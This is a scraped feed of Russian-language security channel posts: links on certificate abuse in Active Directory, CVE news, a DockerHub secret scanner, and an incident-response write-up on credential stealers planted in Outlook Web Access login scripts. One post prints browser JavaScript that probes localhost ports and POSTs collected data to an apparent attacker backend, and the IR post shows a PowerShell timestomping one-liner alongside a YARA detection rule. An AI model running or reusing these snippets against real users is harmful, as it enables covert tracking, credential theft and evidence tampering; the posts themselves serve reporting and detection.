Fsecurity | HH

Друзья, всем прекрасный весенний вечер! В моей голове давно была идея создания небольшого списка вариантов использования сертификатов в средах AD, помимо стандартного запроса билета и UnPAC The Hash. Так родилась небольшая статья на Medium, из которой вы узнаете про различные способы изучения полученного сертификата и нестандартные варианты его использования, как например для аутентификации по SSH или расшифровки HTTPS-траффика Приятного чтения 🙂 https://cicada-8.medium.com/adcs-so-u-got-certificate-now-ive-got-nine-ways-to-abuse-it-861081cff082

🔗Ссылка: https://habr.com/ru/post/889988/

🔗Ссылка: https://www.yeswehack.com/learn-bug-bounty/recon-series-http-fingerprinting

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы. https://qna.habr.com/q/465498 https://x.com/nightlind/status/911806158230495232 Вот скрипт: https://jsfiddle.net/Lknb3xez/ Снимается WebGL fingerprint. Проверяются доступные шрифты, плагины браузера. Снимается: 1 Часовой пояс 2 Локализация (язык) 3 Характеристики видеокарты и CPU 4 Параметры экрана, доступность WebRTC 5 Пробует подключиться к localhost на разных портах:

127.0.0.1:22 (SSH)
127.0.0.1:5900 (VNC)
127.0.0.1:3389 (RDP)
127.0.0.1:80, 5000, 8080

и др.

let portsToScan = [22, 5900, 3389, 5000, 8080];
portsToScan.forEach(port => {
    let img = new Image();
    img.onload = () => {
        reportOpenPort(port);
    };
    img.onerror = () => {};
    img.src = http://127.0.0.1:${port};
});
Отправка собранных данных
fetch('https://example-hh.ru-backend.com/collect', {
    method: 'POST',
    body: JSON.stringify(collectedData)
});

Скрипт не всегда активен: Определяет тип устройства, локацию, поведение пользователя (например, неактивен в режиме инкогнито или под VPN). Внедряется по вероятности или под определённые сценарии. Совет один - Не открывайте доступ браузеру никуда…

➡️ #CVE-2025-24071 - уязвимость спуфинга в Проводнике Windows (File Explorer). 📂 Позволяет злоумышленникам подменять отображение файлов и папок в Проводнике, маскируя вредоносные объекты под безопасные. Это может привести к запуску вирусов, краже данных или успешным фишинговым атакам. 🛡️ Microsoft уже выпустила исправление в мартовском Patch Tuesday 2025 года, так что обновляйте Windows’ы! 💬 По слухам, эта уязвимость продавалась в даркнете до выхода патча. 📖 Блог-пост с подробностями: 👉 https://cti.monster/blog/2025/03/18/CVE-2025-24071.html 💣 PoC: 👉 https://github.com/0x6rss/CVE-2025-24071_PoC

🔗Ссылка: https://www.securitylab.ru/news/557412.php

CVE-2025-0927 LPE HFS+ file system implementation in the Linux Kernel contains a heap overflow vulnerability that achieves local privilege escalation on Ubuntu 22.04 for active user sessions. Affected Versions: • Linux Kernel, up to 6.12.0 • Ubuntu 22.04 with Linux Kernel 6.5.0-18-generic

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://www.securitylab.ru/news/557365.php

🔗Ссылка: https://www.kali.org/blog/kali-linux-2025-1-release/

🔗Ссылка: https://www.securitylab.ru/news/557383.php

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Сложный пароль не поможет 📮 Практика команды реагирования на инциденты информационной безопасности PT ESC IR показывает, что злоумышленники, получая доступ в инфраструктуру компаний, помимо классических бэкдоров и туннелей, иногда встраивают на почтовом сервере дополнительные стилеры учетных записей. Про аналогичное ВПО мы уже рассказывали в прошлом году. Например, в ходе атаки злоумышленники могут получить доступ к почтовому серверу Microsoft Exchange Server и отредактировать файл C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\XX.X.XXXX\scripts\premium\flogon.js, который является inline-скриптом для главной страницы аутентификации logon.aspx на OWA (Outlook Web Access).

<%= InlineJavascript("flogon.js") %>

Атакующие обычно используют базовые методы антифорензики, подменяя временные метки модифицированным файлам.

$path=".\flogon.js";$time = "2020-01-02 07:24:31";(Get-Item $path).LastWriteTime = $time;(Get-Item $path).CreationTime = $time;(Get-Item $path).LastAccessTime = $time`

Как правило, злоумышленники вносят изменения в функцию clkLgn, которая является обработчиком кнопки входа. В функцию добавляют вредоносный код, который в открытом виде перехватывает все учетные записи (логины и пароли), введенные пользователями при авторизации на OWA. Рассмотрим два актуальных примера: 1️⃣ В функции clkLgn формируется URL формата https://[REDACTED]/?key1=smthuser&key2=smthpassword, где smthuser — это логин, а smthpassword — пароль перехваченной учетной записи, и отправляется GET-запрос на управляющий сервер (скриншоты 1, 2). 2️⃣ В другом эпизоде злоумышленники предварительно добавляли на сервер дополнительный сценарий check.aspx, задача которого — запись перехваченных учетных данных в лог log.png на диске. Доступ к логу атакующие могли получать из интернета. Перехват учетных данных, как и в первом примере, осуществлялся модифицированной функцией clkLgn, в код которой была добавлена новая функция chklogin, которая, в свою очередь, вызывала chk, внутри которой формировался URL ./check.aspx?c="smthuser-smthpassword с перехваченными учетными данными в параметре «c» и выполнялся GET-запрос в скрипт check.aspx (скриншоты 3, 4). 👀 Пример журнала log.png:

smthuser-
smthpassword#20250304090723

YARA:

rule PTESC_tool_win_ZZ_clkLgnStealer__Stealer{
  strings:
    $s1 = "//  flogon.js" 
    $s2 = "(\"username\").value"
    $s3 = "(\"password\").value"
    $s4 = "function clkLgn()" 
    $s5 = ".send()" 
  condition:
    all of them and filesize < 20KB
}

Happy hunting! #ir #hunt #yara #dfir #detect #win @ptescalator

tamanoir * eBPF🐝 Keylogger with C2-based RCE payload delivery * Linx

Часто бывает такое, что безопасникам или пентестерам приходится за разработчиками собирать инфу по интернету тк точно известно что «нерадивые» оставляют опасные вещи внутри контейнеров или коде. Написал скрипт #DockerHub-Scanner который ищет по названию в #DockerHub репозитории с образами, разбирает их и ищет уязвимости и токены, секреты и тп и формирует удобный вывод в json и результирующую в csv. PS Наваял на скорую руку, со временем буду дорабатывать https://github.com/cleverg0d/DockerHub-Scanner

🔗Ссылка: https://habr.com/ru/articles/891620/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://habr.com/ru/articles/768752/

🔗Ссылка: https://xakep.ru/2025/03/14/ruby-saml-bugs/